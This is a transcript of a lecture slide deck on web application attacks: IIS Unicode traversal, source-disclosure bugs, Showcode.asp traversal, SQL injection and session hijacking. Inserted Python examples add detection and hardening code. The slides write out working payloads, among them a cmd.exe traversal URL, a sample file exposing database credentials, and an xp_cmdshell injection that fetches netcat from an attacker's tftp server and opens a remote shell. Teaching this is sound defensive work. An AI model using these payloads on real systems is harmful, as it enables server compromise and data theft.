
Network Security Part II: Attacks


Presentation on theme: "Network Security Part II: Attacks"— Presentation transcript:

1 Network Security Part II: Attacks
Web Attacks

2 Overview
Web Architecture
Web Hack Attacks
SECURITY INNOVATION ©2003

3 Web Architecture
Web applications are important, and this importance is accelerating
Web applications are complex, and this complexity is accelerating

4 This is Not New
Problems with web applications are the same problems as with standalone applications

5 Why Target the Web
Everyone is using it
Safe bet the protocol will not become obsolete anytime soon
New technology is being implemented/retrofitted on top (e.g. SOAP, WebDAV)
It’s everywhere! Mobile phones, cars, watches, toasters…
Protocol fundamentally not suited to do a majority of what it’s doing today

Simple Object Access Protocol (SOAP) and the Web Distributed Authoring and Versioning (WebDAV) protocol. WebDAV is a set of extensions to the HTTP/1.1 protocol that allows clients to perform remote web content authoring operations. This extension provides a coherent set of methods, headers, request entity body formats, and response entity body formats that provide operations for:
Properties: the ability to create, remove, and query information about Web pages, such as their authors, creation dates, etc. Also, the ability to link pages of any media type to related pages.
Collections: the ability to create sets of documents and to retrieve a hierarchical membership listing (like a directory listing in a file system).
Simple Object Access Protocol (SOAP) 1.1: SOAP is a lightweight protocol for exchange of information in a decentralized, distributed environment. It is an XML based protocol that consists of three parts: an envelope that defines a framework for describing what is in a message and how to process it, a set of encoding rules for expressing instances of application-defined datatypes, and a convention for representing remote procedure calls and responses. SOAP can potentially be used in combination with a variety of other protocols; however, the only bindings defined in this document describe how to use SOAP in combination with HTTP and HTTP Extension Framework.

6 The Trouble with HTTP
Multitude of involved technologies
The involved protocols are extremely simple; therefore, it is easy to (mis)code services on your own HTTP server
Lack of experience coding public service type, multi-user applications
Stateless nature makes transaction based systems tricky

7 How Did We Get Here?
Unskilled/robotic programmers (“code mills”)
Lack of security-oriented programming training
Tendency to ‘code now, fix later’
Current tools make it very easy to code insecurely
Misconceptions about what ‘security’ really involves

8 Trouble Prone Areas of the Web
Buffer overflows
Classic bug that’s been exploited for quite a while
Lack of bounds-checking in the language a majority of web applications are written in, combined with poor programming practice
Can exist in the web server, application server, database server, or the CGI programs
Fortunately it’s a well-advertised problem
Many scripting languages (ASP, PHP, Perl, .NET, etc) are generally immune, as they have auto-expanding elements

9 Trouble Prone Areas of the Web
Cross-site scripting
Reprinting user data without filtering it for web-specific characters
Potential to trick users into executing JavaScript in the vulnerable site’s context
Partly a ‘social engineering’ technique
More of a liability than a vulnerability—it’s a way to hack the users, not the server

10 Trouble Prone Areas of the Web
SQL tampering
Web server already has/allows access to the database server
Attacker can cause arbitrary SQL to be executed
Results vary from data exposure to full system compromise
Does not require direct database access!
Many applications are vulnerable
Stems from CGIs/scripts making assumptions about user input and not double checking/filtering

11 Trouble Prone Areas of the Web
File includes
It’s common for a CGI to open and display or manipulate the contents of a file on the server
If the filename is composed of user-supplied elements, an attacker may be able to trick the server into opening another file
Can lead to info disclosure or script or command execution

12 Trouble Prone Areas of the Web
Authentication weaknesses
CGIs can fail to check credentials with every request
Thus you bypass the login script and directly access the following scripts, without needing username/password
Or, certain actions/functions may not check for the proper authentication

13 Trouble Prone Areas of the Web
Weak session mechanism
The session/state mechanism uses predictable token IDs
Or, the ID keyspace is too small for the number of users
Either way, an attacker can ‘guess’ a valid token and hijack the session
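A check for the two weaknesses on this slide, added here as an example and not part of the original deck: it measures how likely a single guess is to land on a live session for a given token keyspace and number of active users, tests a sample of issued tokens for a sequential pattern, and shows a generator whose keyspace makes guessing impractical. The sample tokens are constructed.

```python
import math
import secrets
from typing import Sequence

# Constructed sample: tokens as a sequential (predictable) session mechanism might issue them.
# These are made-up values, not taken from any real application.
WEAK_TOKENS = ["100041", "100042", "100043", "100044", "100045"]


def keyspace_bits(alphabet_size: int, length: int) -> float:
    """Bits of keyspace for a token of `length` symbols from an alphabet of `alphabet_size`."""
    return length * math.log2(alphabet_size)


def guess_hit_probability(bits: float, active_sessions: int) -> float:
    """Probability that one random guess equals one of `active_sessions` live tokens.
    With a small keyspace and many users this becomes large: the 'keyspace too small for
    the number of users' case on the slide."""
    return min(1.0, active_sessions / 2 ** bits)


def expected_guesses_to_hijack(bits: float, active_sessions: int) -> float:
    """Expected number of guesses before one collides with a live session."""
    return 2 ** bits / active_sessions


def looks_sequential(tokens: Sequence[str]) -> bool:
    """True when a sample of issued tokens forms an arithmetic progression of integers,
    i.e. the next token is trivially predictable from the ones already seen."""
    try:
        values = [int(t) for t in tokens]
    except ValueError:
        return False
    if len(values) < 3:
        return False
    step = values[1] - values[0]
    return step != 0 and all(b - a == step for a, b in zip(values, values[1:]))


def new_session_token() -> str:
    """128 bits from the OS CSPRNG, hex-encoded. The keyspace is 2**128, so the per-guess
    hit probability stays negligible for any realistic number of active sessions."""
    return secrets.token_hex(16)


if __name__ == "__main__":
    weak_bits = keyspace_bits(10, 6)           # six decimal digits, as in WEAK_TOKENS
    print(f"6-digit tokens: {weak_bits:.1f} bits, "
          f"p(hit) with 10,000 sessions = {guess_hit_probability(weak_bits, 10_000):.4f}")
    print("sequential sample:", looks_sequential(WEAK_TOKENS))
    print("128-bit tokens: expected guesses with 1,000,000 sessions =",
          f"{expected_guesses_to_hijack(128, 1_000_000):.3e}")
    print("fresh token:", new_session_token())
```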

14 Mid Range E-Commerce Roll-Out
Web Server
Application Server
Database Server
… and a Firewall
Maybe some options…
Load Balancer
Reverse Proxy servers
Cache systems

15 Typical Web Application Set-Up
(Diagram: the client sends an HTTP request (cleartext or SSL) through the firewall to the web server (Apache, IIS, Netscape, etc.), which runs the web app through plugins (Perl, C/C++, JSP, etc.) and reaches the SQL database over a database connection (ADO, ODBC, etc.); the HTTP reply carries HTML, JavaScript, VBScript, etc.)

16 Traditional Hacking
Targeted against vulnerabilities in OS components and network services
Buffer overflows
Not portable; attacks specific to operating system architecture, authentication, services, etc.
Myriad of exploits for different services, OS platforms, CPU architectures, etc.

17 Traditional Hacking
...
winsock_found:
    xor eax, eax
    push eax
    inc eax
    call socket
    cmp eax, -1
    jnz socket_ok
    push sockerrl
    push offset sockerr
    call write_console
    jmp quit2
socket_ok:
    mov sock, eax
    mov sin.sin_family, 2
    mov esi, offset _port

Requires specialized coding skills such as writing shell-code for buffer-overflows, etc. In short, it is a complex activity with a limited practitioner base.

18 Limitations of Traditional Hacking…
Modern network architectures are getting more robust and secure.
Firewalls being used in almost all network roll-outs.
OS vendors learning from past mistakes (?) and coming out with patches rapidly.
Increased maturity in coding practices.

19 Utility of Firewalls
(Diagram: hacks on OS network services prevented by firewalls. The firewall in front of the web server, web apps and SQL database blocks wu-ftpd, Sun RPC and NT ipc$ (each marked X); this limits traditional hacking.)

The IPC$ share isn't a "share" in the sense that it is a directory, disk or printer. First off, you can see by the "$" that it's an admin share that is created by default when the system is booted. IPC stands for "interprocess communications", and the IPC$ share provides the capability for logging into the system. Remember that if the sysadmin for the target server has enabled auditing of successful and failed login attempts, then the IPC$ connection attempt will show up in the EventLog. This is true even if you don't successfully log in; it's recorded as a failed login attempt. Close port 139 (NetBIOS).
Wu-Ftpd is an ftp server based on the BSD ftpd that is maintained by Washington University. Wu-Ftpd allows clients to organize files for ftp actions based on "file globbing" patterns. File globbing is also used by various shells. The implementation of file globbing included in Wu-Ftpd contains a heap corruption vulnerability that may allow an attacker to execute arbitrary code on a server remotely. Close port 21 (ftp).
Multiple Vendor Sun RPC xdr_array Buffer Overflow Vulnerability. The xdr_array procedure is used by client/server applications implementing Sun RPC to filter between local C representations of variable length arrays and their machine-independent external data representations (XDR). A buffer overflow vulnerability has been reported in the xdr_array() procedure. Remote attackers may exploit this vulnerability through RPC services to execute arbitrary code on target hosts. As RPC services typically run with root privileges, successful exploitation may mean complete compromise. OpenBSD originally reported that this vulnerability may be exploited by remote attackers to cause a denial of service. If this is a heap-based overflow, the nature of the OpenBSD malloc implementation may only allow for exploitation to cause a crash. Other platforms that use the same Sun RPC code but a different malloc implementation may allow for code execution. Sun RPC: close port 111.

20 Utility of Firewalls
(Diagram: firewall in front of the web server; the web app's connection to the SQL database is unreachable from outside (X).)
Internal back-end application servers are on a non-routable IP network (private addresses).

21 Utility of Firewalls
(Diagram: web server, web apps and SQL database behind the firewall; outbound connections from the web server are blocked (X).)
Outbound access restricted. Why would a web server telnet out?

22 Futility of Firewalls
Web traffic is the most commonly allowed of any of the protocols through enterprise firewalls.
HTTP is perceived as friendly traffic.
Why lay siege to the wall when you have an open door?
Attacks based on content/applications are still viewed by some as rare.

23 Tools Required for Web Hacking
A web browser
An Internet connection
… a clear mind and some spare time!

24 A Classification of Web Hacks
Web attacks fall under the following general categories:
Buffer overflow attacks
SQL injection attacks
Input validation attacks
URL interpretation attacks
Impersonation attacks

25 Firewalls Cannot Prevent…
Complexity mismanagement
Indifference
Web server misconfiguration
(Diagram: web client, firewall, web server.)

26 Attack the Architecture
(Diagram: web server request dispatch. An html file goes to the html handler and is returned with a text/html header; an shtml file has its SSI tags (#exec, #include) processed via /bin/sh and an include file; a cgi goes to a script or executable (sh, perl, …); a jsp has its JSP tags processed, is compiled to a class by the Java Compiler and run in the Java Runtime; anything else goes to the default handler (??).)

27 Web Server Architecture Attacks
Complex web server architectures can lead to implementation vulnerabilities.
A common attack is to bypass the web server configuration directives and invoke the built-in procedures directly.
A close look at the web server architecture can reveal security problems.

28 Architecture Misconfigurations
Handler Forcing: certain mis-configurations allow handlers to be forced onto files that are not supposed to be processed by them.
Forcing a default handler onto a CGI file can cause the contents of the CGI file to be returned “as-is”.
Forcing a JSP handler onto an HTML file can cause the contents of the HTML file to be compiled by the Java compiler and executed by the Java run-time machine.

29 JSP Handler Forcing
(Diagram: the JSP PageCompile handler is forced onto html files. Instead of the html handler returning the file with a text/html header, the jsp handler processes the JSP tags, the Java Compiler produces a class and the Java Runtime executes it.)

30 Firewalls Cannot Prevent…
Poor checking of user inputs
Input validation attacks
URL interpretation attacks
(Diagram: web client, web server, web app.)

31 URL Interpretation Attacks
Several well known vulnerabilities in Windows NT and Internet Information Services dating from Autumn 2000 have been wrapped into a common definition: "The Unicode Bug."
URL parsing vulnerability.
Improper handling of illegal Unicode sequences.
Allows remote users to execute arbitrary commands on the web server in the context of IUSR.
Can lead to potential Administrator level access.

32 The IIS Unicode Bug
Exploit: %c0%af = “/”
winnt/system32/cmd.exe?/c+dir+c:\
An attacker could view a directory listing of a server's C:\ drive
Can use HTTP POST to send multiple commands at a time to cmd.exe

Once an attacker has remote read and execute permissions, still in the context of IUSR_computername, what she needs next, if only for defacement, is write access. By typing cmd.exe+cmd1.exe the attacker is able to write the file c:\winnt\system32\cmd.exe to c:\Inetpub\scripts\cmd1.exe. Now the attacker has write access to an executable directory and has copied an executable file into that directory. This is an important change in the Unicode Bug discovered by NSFocus. By building on the first Unicode vulnerability discovered by Rain Forest Puppy, an attacker gains control of the web server by writing Very Bad Things to that executable directory and then running them. Several tools are freely available that facilitate remotely ECHOing or TYPEing a command line script on the server. Tools are also available to upload a command line script, Active Server Page, or executable file to the server. By leveraging several similar vulnerabilities, the attacker has exploited the friendly sounding and all encompassing "Unicode Bug" to remotely write or upload an ASP or script to an executable directory on a webserver. The BackGate kit contains E.ASP, a Visual Basic Script. The above Unicode exploits are achieved in the security context of IUSR_computername. Nevertheless, it is game over for the server when IIS4 defaults to handing certain ASPs to Local System for execution. When retrieved remotely by a web browser, E.ASP runs with the process token of Local System: a built-in member of the Administrators group. The subsequent installation processes, batch files and downloaded attacker applications also run in the context of Local System. In a default installation of NT4/IIS4, this configuration is by design.

33 Web Hacking for Collateral Damage
Web hacking can result in three types of collateral damage.
Information disclosure (paths etc.)
Arbitrary file content and source code leakage
Data disclosure (i.e. return all rows)
Arbitrary command execution

34 Source Code Disclosure
"Use the Source, Luke!"
WebLogic / WebSphere “JSP” bug (1)
Ability to retrieve source code of JSP/JHTML files
Using uppercase “JSP” in the URL causes the server to return unparsed JSP code
(1) Discovered by Shreeraj Shah, Foundstone.

Java application server platforms, such as BEA WebLogic and IBM WebSphere, are becoming increasingly popular. They offer platform independence, flexibility, versatility, ease of integration, and a very rich object-oriented platform for developing applications. As a result, mistakes in programming and implementation have crept into some Java application servers, causing source code disclosure vulnerabilities and, in some cases, remote command execution vulnerabilities. Programmers sometimes neglect security and take shortcuts, especially when they are pressed by hard deadlines. In some cases developers may be blindly trusting code from Web sites or book examples. This is free stuff, and it is doubtful that code contributors who offer their code for free actually take the trouble to write the code in a secure manner. Java application servers offer Web application developers three kinds of technologies: Java Server Pages (JSP), Java HTML (JHTML), and Java servlets. JSP and JHTML allow developers to embed Java code within HTML pages. The code gets compiled, executed, and delivered when the page is requested. As an example, a JSP file that displays the current date and time:
<% String s = new java.util.Date().toString(); %><br>
The date is: <%= s %>
If this file is stored as date.jsp and is running on a Java application server, accessing the URL will cause the file to be compiled and executed on the server. The output will be returned to the Web browser:
The date is: Sat Sep 16 15:54:26 PDT 2000
Java servlets, on the other hand, are more analogous to CGI scripts because the servlets are written in Java and execute within the context of the Java Web server itself.
This was an accidental discovery made by leaving the Caps Lock key on when typing in the URL. The Capital JSP bug was found on two popular Java application server platforms, BEA's WebLogic server and IBM's WebSphere server, and is a classic case of a "handler mismatch" vulnerability, where the Web server was unable to determine the file type of DATE.JSP.

35 A Classic Case of “Handler Mismatch”
(Diagram: the WebLogic Server receives the HTTP request index.JSP; the html, shtml, jhtml and jsp handlers do not match it (X), so the default handler serves index.JSP = index.jsp as a plain file instead of processing the JSP tags, compiling it with the Java Compiler and running it in the Java Runtime.)
weblogic.httpd.register.file=weblogic.servlet.FileServlet
weblogic.httpd.register.*.shtml=weblogic.servlet.ServerSideIncludeServlet
weblogic.httpd.register.*.jhtml=weblogic.servlet.jhtmlc.PageCompileServlet
weblogic.httpd.register.*.jsp=weblogic.servlet.JSPServlet

The underlying technology is not at fault; the problem is in the implementation of the programs that deliver the technology, coupled with the size and complexity of modern systems. The lesson to be learned is that the liability of running a secure site is on the IT managers themselves. IT teams must keep current with the latest security vulnerabilities and associated patches that affect each component within their systems in order to keep one step ahead of the hacker.

36 More Source Disclosure
URL prefixes for source code disclosure (1):
/servlet/file/ (IBM WebSphere)
/file/ (BEA WebLogic)
/*.shtml/ (BEA WebLogic)
/ConsoleHelp/ (BEA WebLogic)
/servlet/com.sun.server.http.servlet.FileServlet/ (Sun JavaWebServer)
(1) Advisories located on:

These represent another type of vulnerability that returns unparsed files. They involve forcing the requested file to be handled by the default handler, or in the case of Java application servers, the default servlet. Again, BEA's WebLogic and IBM's WebSphere suffered from this vulnerability. The problem is associated with the way in which servlets are registered and mapped to URLs. With WebLogic, the URL prefix /file/ is mapped to the default file servlet in the weblogic.properties file. A snippet from a default weblogic.properties file is given below:
# Default servlet registration
#
# Virtual name of the default servlet if no matching servlet
# is found
weblogic.httpd.defaultServlet=file
weblogic.httpd.register.file=weblogic.servlet.FileServlet
If a URL is prefixed with /file/, the FileServlet servlet will be invoked, no matter what. If the server were running WebLogic, accessing the URL would cause date.jsp to be processed through FileServlet, and not compiled and executed as it should be, returning the contents of date.jsp unparsed. In WebSphere, the URL prefix to invoke the default servlet is /servlet/file. The above example, if running on WebSphere, would require the URL in order to exploit this vulnerability.

37 …I Thought it was Functionality
IIS “+.htr” bug
View source code of ASP/ASA files
URL interpretation vulnerability
“.htr” causes ISM.DLL to handle the URL
Characters after the “+” sign (space) are ignored

One of the first Web vulnerabilities affecting IIS 5.0 was the .htr handler parsing vulnerability. IIS's Internet Service Manager uses ism.dll to handle .htr files. IIS uses asp.dll to handle ASP files. Using the .htr vulnerability, it is possible to have any file (.asp, .asa, and so forth) be handled by ism.dll instead of asp.dll. Because ism.dll is not designed to parse ASP tags, it sends out the code as is. To invoke the vulnerability, all the remote attacker has to do is suffix the URL string with +.htr. To view the source code contained in default.asp on using this vulnerability, an attacker would use the URL . Nothing gets displayed in the browser window, but you only have to select View/Source to see the ASP code. Exploits don't get much simpler than this. Firewalls can't stop it, and it even works with Windows 98 and AOL. One file of particular interest on any Web site based on IIS ASP and SQL Server is global.asa. The global.asa file lies in the Web document root and contains configuration parameters for the Web application. Configuration parameters can include predefined variables, stored user names and passwords for database connections, system names, and database server addresses. Getting the global.asa file gives the attacker the master key to the Web fortress.
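Detection logic for the URL-interpretation and source-disclosure requests described on slides 31 to 37 (the overlong %c0%af escape and the traversal it enables, the uppercase .JSP handler mismatch, the default-servlet prefixes, and the +.htr suffix), added here as an example and not part of the original deck. It runs over constructed Common Log Format lines with made-up addresses and paths, and the rule names are my own. The overlong-escape rule generalises the slide's %c0%af case to any two-byte UTF-8 sequence with a C0 or C1 lead byte, all of which are illegal overlong encodings.

```python
import re
from typing import Dict, List, Optional
from urllib.parse import unquote

# Constructed Common Log Format lines (hypothetical hosts and paths); the first and last
# lines are legitimate requests and must not be flagged.
SAMPLE_LOG = "\n".join([
    '10.0.0.5 - - [12/Mar/2003:10:01:02 -0500] "GET /index.html HTTP/1.0" 200 1043',
    r'10.0.0.7 - - [12/Mar/2003:10:01:09 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 200 512',
    '10.0.0.9 - - [12/Mar/2003:10:02:14 -0500] "GET /date.JSP HTTP/1.0" 200 220',
    '10.0.0.9 - - [12/Mar/2003:10:02:20 -0500] "GET /file/date.jsp HTTP/1.0" 200 220',
    '10.0.0.9 - - [12/Mar/2003:10:02:31 -0500] "GET /servlet/file/date.jsp HTTP/1.0" 200 220',
    '10.0.0.11 - - [12/Mar/2003:10:03:05 -0500] "GET /default.asp+.htr HTTP/1.0" 200 0',
    '10.0.0.11 - - [12/Mar/2003:10:03:40 -0500] "GET /global.asa+.htr HTTP/1.0" 200 0',
    '10.0.0.5 - - [12/Mar/2003:10:04:00 -0500] "GET /date.jsp HTTP/1.0" 200 64',
])

REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')
# Any %C0xx / %C1xx pair is an overlong (illegal) two-byte UTF-8 sequence; %c0%af is the "/" case.
OVERLONG_RE = re.compile(r'%c[01]%[89ab][0-9a-f]', re.I)
# "+.htr" (or "%20.htr") appended to a URL routes it to ism.dll, which returns the file unparsed.
HTR_SUFFIX_RE = re.compile(r'(?:\+|%20)\.htr$', re.I)
SHTML_PREFIX_RE = re.compile(r'\.shtml/', re.I)
# Default-servlet prefixes listed on slide 36, compared case-insensitively.
DEFAULT_SERVLET_PREFIXES = (
    "/file/", "/servlet/file/", "/consolehelp/",
    "/servlet/com.sun.server.http.servlet.fileservlet/",
)


def decode_like_flawed_parser(path: str) -> str:
    """Model the IIS behaviour on slide 32: the overlong %c0%af was decoded to "/" after the
    traversal check had run, so decode it explicitly and then apply ordinary %xx decoding."""
    return unquote(re.sub(r'%c0%af', '/', path, flags=re.I))


def classify(path: str) -> List[str]:
    """Return the names of every rule the request path trips (empty list if none)."""
    decoded = decode_like_flawed_parser(path)
    hits = []
    if OVERLONG_RE.search(path):
        hits.append("overlong-utf8-escape")
    segments = decoded.replace("\\", "/").split("/")
    if any(seg == ".." for seg in segments):
        hits.append("directory-traversal")
    if HTR_SUFFIX_RE.search(path):
        hits.append("htr-suffix-source-disclosure")
    ext = decoded.rsplit(".", 1)[-1] if "." in decoded else ""
    if ext.lower() in ("jsp", "jhtml") and ext != ext.lower():
        hits.append("mixed-case-jsp-handler-mismatch")
    if decoded.lower().startswith(DEFAULT_SERVLET_PREFIXES) or SHTML_PREFIX_RE.search(decoded):
        hits.append("default-servlet-prefix")
    return hits


def parse_line(line: str) -> Optional[Dict[str, object]]:
    """Split one CLF line into its fields; None if the line does not parse."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    ip, when, method, path, status = m.groups()
    return {"ip": ip, "time": when, "method": method, "path": path, "status": int(status)}


def scan_log(text: str) -> List[Dict[str, object]]:
    """Parse every line and keep the requests that trip at least one rule. A 2xx status on a
    flagged request means the server served it, which is what should be escalated."""
    findings = []
    for line in text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        hits = classify(str(rec["path"]))
        if hits:
            rec["hits"] = hits
            findings.append(rec)
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f'{f["ip"]:<10} {f["status"]} {", ".join(f["hits"]):<45} {f["path"]}')
```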

38 Doom on You…
User ID: sa  Password: n0t4u2c

<SCRIPT LANGUAGE="VBScript" RUNAT="Server">
Sub Application_OnStart
   Set Db = Server.CreateObject("Commerce.DbServer")
   Db.ConnectionString = "DSN=trans.db;UID=sa;PWD=n0t4u2c"
   Db.Application = "
   Set Application("Db") = Db
End Sub
Sub Session_OnStart
   '==Visual InterDev Generated - DataConnection startspan==
   '--Project Data Connection
   Session("DataConn_ConnectionString") =
   "DSN=CertSrv;DBQ=C:\WINNT2\System32\CertLog\certsrv.mdb;DriverId=25;
   FIL=MS Access;MaxBufferSize=512;PageTimeout=5;"
   Session("DataConn_ConnectionTimeout") = 15
   Session("DataConn_CommandTimeout") = 30
   Session("DataConn_RuntimeUserName") = ""
   Session("DataConn_RuntimePassword") = ""
   '==Visual InterDev Generated - DataConnection endspan==
End Sub
</SCRIPT>

For example, accessing the URL gets us the contents of the global.asa file. Note the UID and PWD entries in the database connection string. These entries give the attacker a user ID and password to connect to the Commerce DbServer: User ID: sa, Password: n0t4u2c.

39 More Source Disclosure
Some applications access files without appropriate checking.
Input validation vulnerability.
No checking performed for file type or location.
Filenames can be manipulated via parameters passed on the URL or as hidden fields.

40 NT IIS Showcode ASP Vulnerability
Active Server Page (ASP) script installed by default on Microsoft's Internet Information Server (IIS) 4.0
Gives remote users access to view any file on the same volume as the web server that is readable by the web server

Showcode.asp is a script that allows a web developer to view the code for a number of samples included with Internet Information Server that are not intended to be installed on production servers. It comes under several different guises, including showcode.asp, viewcode.asp, and codebrws.asp. It lets you view the code of a server-side script without executing it, and with some manipulation of the URL it lets you view any file on the same drive as the script. With this in place one could easily compromise an entire server and any sensitive information it contains. The difference between innocent use of this file and malicious use is how you format the arguments passed to the script. Although there are numerous variations of the vulnerable script, this demonstration will use the most common, Showcode.asp. Showcode.asp is included as an example with the Microsoft Data Access Components that are installed in C:\Program Files\Common Files\SYSTEM\MSADC. If one is running a web server, that subdirectory is also mapped as a virtual directory named MSADC off the web root. Showcode.asp takes a single argument indicating the name of the file that is to be viewed. Since this sample code was initially intended to view code samples in the MSADC directory, the developer thoughtfully put a restriction in code that would only allow paths that started with MSADC. Once again a sloppy implementation led to a big problem. One was restricted to a path starting with MSADC, but simple directory traversal allowed one to move up the directory tree and on to any path on the same drive. For example, this URL would reveal the contents of the boot.ini file in the root directory:
asp?source=/msadc/Samples/../../../../../boot.ini
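The prefix check this slide describes beside a hardened replacement, added here as an example and not the script's own code: the vulnerable version accepts any argument that begins with /msadc/, so the ../ segments pass untouched, while the fixed version normalises the path first, re-tests the prefix on the result, and independently confirms the mapped file stays under a hypothetical document root (DOC_ROOT and the sample paths are assumptions).

```python
import posixpath
from typing import Optional

# Hypothetical values for the example: the document root the script serves from and the
# only URL prefix a showcode-style viewer was ever meant to expose.
DOC_ROOT = "/inetpub/wwwroot"
ALLOWED_PREFIX = "/msadc/"


def vulnerable_allowed(source: str) -> bool:
    """The check slide 40 describes: accept anything that *starts* with the MSADC prefix.
    ".." segments after the prefix are never examined, so the traversal passes."""
    return source.lower().startswith(ALLOWED_PREFIX)


def normalise_url_path(source: str) -> str:
    """Collapse "." and ".." lexically, treating "\\" as "/" and forcing an absolute path.
    posixpath.normpath never climbs above "/", so surplus ".." segments are discarded."""
    return posixpath.normpath("/" + source.replace("\\", "/").lstrip("/"))


def hardened_allowed(source: str) -> bool:
    """Refuse anything the parser should not see, normalise, then test the prefix on the
    *result* rather than on the raw argument."""
    if "%" in source or "\x00" in source:
        # The argument must already be decoded exactly once; leftover escapes or NUL
        # bytes mean it was not, so refuse rather than guess.
        return False
    return normalise_url_path(source).lower().startswith(ALLOWED_PREFIX)


def map_to_filesystem(source: str) -> Optional[str]:
    """Return the filesystem path the viewer may open, or None if the request is refused.
    The prefix test and the containment test under DOC_ROOT are independent guards."""
    if not hardened_allowed(source):
        return None
    full = posixpath.normpath(posixpath.join(DOC_ROOT, normalise_url_path(source).lstrip("/")))
    if posixpath.commonpath([DOC_ROOT, full]) != DOC_ROOT:
        return None
    return full


if __name__ == "__main__":
    for arg in ("/msadc/Samples/sample1.htm",
                "/msadc/Samples/../../../../../boot.ini",
                "/msadc/..\\..\\boot.ini"):
        print(f"{arg!r:<45} vulnerable={vulnerable_allowed(arg)!s:<5} "
              f"hardened={hardened_allowed(arg)!s:<5} opens={map_to_filesystem(arg)}")
```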

41 Firewalls Cannot Prevent…
(Diagram: the HTTP request (cleartext or SSL) passes from the web client through the firewall to the web server, web apps and SQL database.)
URL interpretation attacks
Input validation attacks
Extend SQL statements
SQL query poisoning

42 SQL Query Poisoning
Poor input validation on parameters passed to SQL queries can be disastrous.
Return all rows:
Resultant query: SELECT * FROM PRODUCT WHERE ID=3 OR 1=1

43 SQL Query Poisoning
Drop Table:
Resultant query: SELECT * FROM PRODUCT WHERE ID=3 DROP TABLE PRODUCT

44 SQL Query Poisoning
Remote Command Execution!
ID=3%01EXEC+master..xp_cmdshell+‘tftp+-i GET+nc.exe+ %26%26+nc+-e+cmd.exe ’
Command executed: tftp -i GET nc.exe && nc -e cmd.exe

45 SQL Remote Commando
(Diagram: web browser, IIS running the ASP, the DB, the attacker's tftp server and nc.exe, and a C:\>_ prompt, numbered 1 to 3. The query passed to the DB is SELECT * FROM PRODUCT WHERE ID=3 EXEC master..xp_cmdshell tftp -i GET nc.exe && nc -e cmd.exe.)
tftp server to get nc.exe transferred over to the NT IIS box.
Listener at port 2001 to receive the connection.
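The two outcomes on slides 42 and 43, reproduced against an in-memory SQLite table beside a parameterised version, as an added example that is not code from the slides; the rows are constructed. The slides' target is SQL Server, so the batched-statement case uses executescript(), because Python's sqlite3 execute() refuses more than one statement per call whereas SQL Server runs the whole batch.

```python
import re
import sqlite3
from typing import List, Tuple

Row = Tuple[int, str, float]


def make_db() -> sqlite3.Connection:
    """In-memory PRODUCT table with constructed rows (not data from the slides)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE PRODUCT (ID INTEGER PRIMARY KEY, NAME TEXT, PRICE REAL)")
    conn.executemany("INSERT INTO PRODUCT VALUES (?, ?, ?)",
                     [(1, "widget", 9.99), (2, "gadget", 19.99), (3, "gizmo", 29.99)])
    conn.commit()
    return conn


def table_exists(conn: sqlite3.Connection, name: str) -> bool:
    row = conn.execute("SELECT 1 FROM sqlite_master WHERE type='table' AND name=?",
                       (name,)).fetchone()
    return row is not None


def vulnerable_lookup(conn: sqlite3.Connection, user_id: str) -> List[Row]:
    """Slide 42: the URL parameter is pasted into the statement text, so "3 OR 1=1"
    becomes part of the WHERE clause and every row comes back."""
    sql = "SELECT * FROM PRODUCT WHERE ID=" + user_id
    return conn.execute(sql).fetchall()


def vulnerable_lookup_batch(conn: sqlite3.Connection, user_id: str) -> None:
    """Slide 43: the same concatenation on a driver that executes a whole batch. A second
    statement smuggled in after ";" runs with the application's database rights."""
    sql = "SELECT * FROM PRODUCT WHERE ID=" + user_id
    conn.executescript(sql)   # SELECT results are discarded; the side effect is the point


def is_valid_id(user_id: str) -> bool:
    """Positive-integer IDs only; anything else is rejected before it reaches the database."""
    return re.fullmatch(r"[1-9]\d{0,8}", user_id) is not None


def safe_lookup(conn: sqlite3.Connection, user_id: str) -> List[Row]:
    """Validate the type, then bind the value as a parameter. The parameter is never
    part of the SQL text, so no input can change the statement's structure."""
    if not is_valid_id(user_id):
        raise ValueError("ID must be a positive integer")
    return conn.execute("SELECT * FROM PRODUCT WHERE ID=?", (int(user_id),)).fetchall()


if __name__ == "__main__":
    db = make_db()
    print("vulnerable, ID=3       :", vulnerable_lookup(db, "3"))
    print("vulnerable, ID=3 OR 1=1:", vulnerable_lookup(db, "3 OR 1=1"))
    print("safe, ID=3             :", safe_lookup(db, "3"))
    print("safe accepts '3 OR 1=1':", is_valid_id("3 OR 1=1"))
    vulnerable_lookup_batch(db, "3; DROP TABLE PRODUCT")
    print("PRODUCT still exists   :", table_exists(db, "PRODUCT"))
```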

46 Firewalls Cannot Prevent…
Reverse engineering HTTP cookies
Session Hijacking/Impersonation
(Diagram: web client, firewall, web server, web apps and SQL database; HTTP session hijacking, impersonation, URL interpretation attacks, input validation attacks and SQL query poisoning all pass through the firewall.)

The act of taking control of the session after successfully obtaining or generating an authentication token is called Session Hijacking. The user may or may not still have all or partial control of their session, and may be kicked out in the process. Session Hijacking is usually the result of a successful replay or brute force attack in which an attacker is able to successfully access a user's active session without proper user authentication. An attacker is able to take control of an active session simply by pasting a URL into their browser or by loading stolen cookie data into and accessing a particular web site or URL. Once the attacker has successfully obtained access to the legitimate user's session, he can perform all of the same functions such as reading , making online purchases, etc.
Potential Exploit: An attacker is able to discover an active session to a banking web application by brute forcing through a sequential list of URLs until a non-404 response is returned. The attacker then pastes the discovered URL into his browser, takes control of the session, goes to online bill pay, writes himself a large check, and logs out, then goes to Best Buy to pre-spend his ill gotten gain.
Counter Measures:
When practical, limit successful sessions to specific IP addresses. This usually only works when dealing with an intranet setting where the IP ranges are predictable and finite.
Re-authenticate the user before critical actions are performed (i.e. a purchase, money transfer, etc.)
If possible, try to limit unique session tokens to each browser instance (e.g. generate the token with a hash of the MAC address of the computer and process id of the browser, etc.)
Follow the same general set of countermeasures to prevent Replay and Brute Force attacks.
Use x.509 certificates to prevent more traditional types of TCP traffic predictable sequence number hijacking.

47 Firewalls Cannot Prevent…
Application bugs
